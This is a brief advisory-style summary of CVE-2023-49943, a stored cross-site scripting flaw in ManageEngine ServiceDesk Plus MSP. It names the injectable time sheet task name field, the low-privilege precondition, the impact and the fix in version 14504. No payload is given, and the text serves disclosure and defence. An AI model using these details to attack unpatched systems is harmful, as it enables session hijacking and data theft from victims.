CVE-2023-49943

Vulnerability

A stored cross-site scripting (XSS) vulnerability exists in Zoho ManageEngine ServiceDesk Plus MSP versions 14503 and below. A low-privileged technician can inject arbitrary JavaScript into the task name field when creating a time sheet entry. The injected script is stored and later executed when a target user views the task from the "Request/Project/Change/Task" column on the time sheet details page [2].

Exploitation

An attacker must have a low-privileged technician account in the ServiceDesk Plus MSP instance. The attacker creates a new time sheet and sets the task name to a malicious JavaScript payload. When any user (including higher-privileged users) opens the corresponding task from the time sheet details page, the injected script executes in the context of that user's browser session [2].

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's session. This can lead to further attacks such as session hijacking, data exfiltration, or performing actions on behalf of the victim within the application [2].

Mitigation

The vulnerability is fixed in version 14504, released on November 1, 2023. Users should upgrade to this version or later. No workarounds are documented in the available references [2].